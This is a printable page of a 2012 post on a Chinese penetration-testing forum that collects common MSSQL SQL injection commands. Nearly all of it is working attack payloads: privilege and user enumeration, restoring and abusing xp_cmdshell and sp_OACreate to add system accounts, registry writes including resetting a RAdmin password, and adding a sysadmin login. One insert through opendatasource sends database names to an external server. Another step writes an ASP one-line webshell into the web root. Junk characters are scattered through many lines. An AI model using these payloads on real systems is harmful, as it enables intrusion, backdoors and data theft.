中国网络渗透测试联盟

标题: 常用的一些注入命令 [打印本页]

作者: admin    时间: 2012-9-15 14:40
标题: 常用的一些注入命令
//看看是什么权限的
2 Q5 n3 Q& f# b6 O& s1 t) wand 1=(Select IS_MEMBER('db_owner'))
* i+ r5 v$ q/ @3 D+ wAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--# B. Y/ E/ c- k0 ]) a9 Z- @. \# G

) V8 \4 y8 G2 T4 ?; l9 X2 A7 m//检测是否有读取某数据库的权限2 g6 h: g5 E+ f1 `& V3 T3 N' X
and 1= (Select HAS_DBACCESS('master')), m* b* ?' U& I1 m$ _5 `
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
2 g8 q2 D5 P2 `7 y, ^, Q) U$ ]. z6 c" v
* q7 w7 Y5 z4 d* ]
数字类型" _' d$ b* B1 h3 X
and char(124)%2Buser%2Bchar(124)=01 Y6 p) o5 J- V# H4 N
" ?( T/ [$ w2 T- z0 {3 ]7 M* g
字符类型
) G$ _: i/ F/ c% Q, v8 v' and char(124)%2Buser%2Bchar(124)=0 and ''='
6 E7 A4 z, [3 {6 v( E+ ?
! X3 X" G5 l2 O: @5 H搜索类型
! e. V& E* F$ _' and char(124)%2Buser%2Bchar(124)=0 and '%'='  Z* J0 b  C* U
% m3 I, |2 E8 P% I
爆用户名
8 N) \0 T. ]5 Z) }and user>0  }3 J/ g9 x- B1 }4 o$ B/ v; c
' and user>0 and ''='
# A3 q! }% s: v; e, ], W7 ^9 Q1 g2 D
检测是否为SA权限% w: i  f8 e: U1 \6 G
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--2 s4 J* C) R( M6 W7 _
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --5 p; d! H7 B$ A3 H# ^
1 J( H+ @1 u5 M5 K3 K/ a
检测是不是MSSQL数据库# I& E, g% h; g0 X! O. z- p! |
and exists (select * from sysobjects);--* M0 ^6 Y: f" U7 d. w

- ]. o- k: W; {2 f, J# Q; o检测是否支持多行
% v. I" Y9 t2 _; U$ e. l;declare @d int;--4 k$ z- s( B# d, x# V
2 P  c1 ?# W4 K" k
恢复 xp_cmdshell
" E( ~0 D! ^: y, C  g- [;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
4 ~3 |& H3 k9 X2 H
* ]' K/ h. ]! o& T' [3 W( M) i5 H% g# L8 K8 w1 \1 @
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')+ v1 i+ {% R, x5 L( `

& c4 ~4 W9 M$ X* _//-----------------------
7 d- F' ?0 Q) a; w' H. O4 K" O//       执行命令
# _! R' `7 w; I& l0 C2 X//-----------------------
4 e$ K# s6 b% r首先开启沙盘模式:* \( x* B  c* T1 W  |
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1) p* }7 @4 K5 b5 |- k
) j. [" {' f, H  K
然后利用jet.oledb执行系统命令
$ ]* `- q, t" qselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')$ {5 h$ S! V5 A
2 m" h9 B$ ~, t% m6 C2 X
执行命令9 m2 M( I' T" O" V# X
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
% }5 d3 z* x, @; K
6 C; Q; x, G  i. {0 W. {0 zEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
9 t. h. v6 L) c4 |- b2 ^$ v3 s3 Q2 u( @+ T- r2 o  n
判断xp_cmdshell扩展存储过程是否存在:% K+ Y6 L) v7 ~2 R+ d- h5 V5 b7 c
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
$ W8 e5 Q2 O; C9 m4 n+ u1 n& R: d, ?- P( q/ c
写注册表
- M- G! V5 y* W8 p9 s3 kexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1& Y4 Q" t# B5 C2 `# M8 o

6 H' S% q/ N, h* @REG_SZ
, x9 C/ _8 F. D
! I. \+ n/ w7 r7 Q读注册表
  \" c- K. W( I3 G8 @; E  X4 eexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'" y. x( R" v: F% }% m" J8 X

! D7 }# p; H& M- a  R% g读取目录内容
9 U/ K; I9 L$ C6 B/ Yexec master..xp_dirtree 'c:\winnt\system32\',1,1
) _  Q7 T2 n4 A% x# v  {4 A- H2 f0 x: }
; V, {7 o, `6 v
数据库备份. ]! {5 I  Y" A7 L' ~6 @
backup database pubs to disk = 'c:\123.bak'' c$ D: A! P6 o. t
/ y. [8 U' o1 U+ h! z; y6 M; v
//爆出长度3 O6 Q% k6 X9 _& t4 o: a3 M
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--. [1 F( e! z1 _/ [

* s0 Z* b! M- C. g: d5 Z& T# m: Y1 g
2 L; B8 U8 m  w% ^$ o+ A  W) n( {/ {0 b* t+ v
更改sa口令方法:用sql综合利用工具连接后,执行命令:
! l; y2 N# _  c; cexec sp_password NULL,'新密码','sa'
, v) W5 _& _, y4 I* y$ v5 f& O5 S: n6 W, [, G" R7 Y
添加和删除一个SA权限的用户test:
" H. n3 ?  T0 C( |exec master.dbo.sp_addlogin test,9530772
% @; }4 s& S, ?+ j5 Hexec master.dbo.sp_addsrvrolemember test,sysadmin
6 @& }  h# B* V2 M: X6 ]3 U" S' r! y5 Q2 n" P  [
删除扩展存储过过程xp_cmdshell的语句:9 W  J) e% |, F, ?) R- F
exec sp_dropextendedproc 'xp_cmdshell'
! v7 U7 [/ @7 @' f( I/ }& h
: }+ D5 x- U4 ]. X8 M3 B添加扩展存储过过程
# y1 |( k0 m7 R" _, tEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'/ m+ T& |. A& P5 E
GRANT exec On xp_proxiedadata TO public
$ Z: v: s5 ^. a1 E: U- B0 y7 r% A9 k3 A0 `

6 n* @3 Q  s) M4 v+ K* f) D" |停掉或激活某个服务。
2 d8 J0 c; n8 X7 q& l  l, ~8 B: e: E
exec master..xp_servicecontrol 'stop','schedule'
- J- h. t( w) t4 i; n7 ^exec master..xp_servicecontrol 'start','schedule'6 X& u0 }$ N8 L3 }, {

+ j! I6 J6 U* Wdbo.xp_subdirs( g( o* ?4 C. x. w% J! ~- V

& h' Z6 v! X" w& H- i7 A只列某个目录下的子目录。
/ u' |5 K6 R7 X  ~xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'$ A5 _  m! i4 O" H" T
9 J7 h; H5 U$ @- p0 q7 \
dbo.xp_makecab
1 \- |5 J  V2 i+ q) T! a. ?" `: m) o1 G" D- A
将目标多个档案压缩到某个目标档案之内。. D% c  u( ~+ l3 {; k$ Z
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
! x5 I  p. [) ~; {+ r+ Y- H! i% N: K  J' f, m* y. r2 j
dbo.xp_makecab
$ x( u5 }. D9 o'c:\test.cab','mszip',1,
2 U* K3 l: n0 w* P! g$ P'C:\Inetpub\wwwroot\SQLInject\login.asp',* _+ X+ D+ a' r& b, L' W  ^
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
2 h- w* a  n8 X8 `
3 W: x7 Z$ J7 ~$ p. mxp_terminate_process$ o7 @% P" H& n
9 w. D, Z( [2 O+ l9 X8 T6 ^
停掉某个执行中的程序,但赋予的参数是 Process ID。
) O4 Y( d! T; I1 t" {9 h) z: w利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
. K) T, |; U7 Q2 f: C9 H5 i# q$ s4 D3 C5 e3 s5 J  {, h1 F$ b/ G
xp_terminate_process 2484
# E( P2 N- z, s4 i6 o( y+ _, V1 W0 G  Q
xp_unpackcab, a( u6 d; c6 f0 Q
) V* d! J4 o. T9 Y# N
解开压缩档。, ?. M4 e* T( [3 d5 W

. ~' `$ l  {# Yxp_unpackcab 'c:\test.cab','c:\temp',12 d4 O' `9 V* {. H' V  {

' v' p4 _- f/ K" J* x. J0 l1 a& i( G+ f1 ~, z& e
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234/ j# b5 O( P3 a: l2 w

  `" u6 |. t- J5 S& s5 ?4 v$ Ocreate database lcx;6 D- T* x0 F, A" n" K5 M& S3 y
Create TABLE ku(name nvarchar(256) null);
( f, O% ^$ C- y; h9 ^/ g8 ?4 I9 uCreate TABLE biao(id int NULL,name nvarchar(256) null);
* n# H* G" N) L7 D' H
# q: |( O5 x! w. {//得到数据库名# r$ y: F# ?. J# D# ?, g1 |
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
( }- F8 m! V$ P: s9 G) {# P$ m$ H( D: a. C0 `5 d7 P
: c: N# o! L4 r! I
//在Master中创建表,看看权限怎样
# t/ z0 M. n" y7 n2 ~* T/ bCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
' X  D+ G: D& ^3 L  Q+ F; B3 k/ U( ^- g8 a$ {; _& t
用 sp_makewebtask直接在web目录里写入一句话马:
* Q1 }4 A1 t8 l: [http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--5 s3 a7 _6 L* Q. ^- C

. M/ J8 E) j1 r% W/ v) X//更新表内容
( R; k) E- w; }1 m5 h7 tUpdate films SET kind = 'Dramatic' Where id = 123
) v$ |) G5 U9 d& B3 q# d
7 t+ A2 k4 P% F//删除内容
9 r- T7 p5 f% i) D) J& Vdelete from table_name where Stockid = 3




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2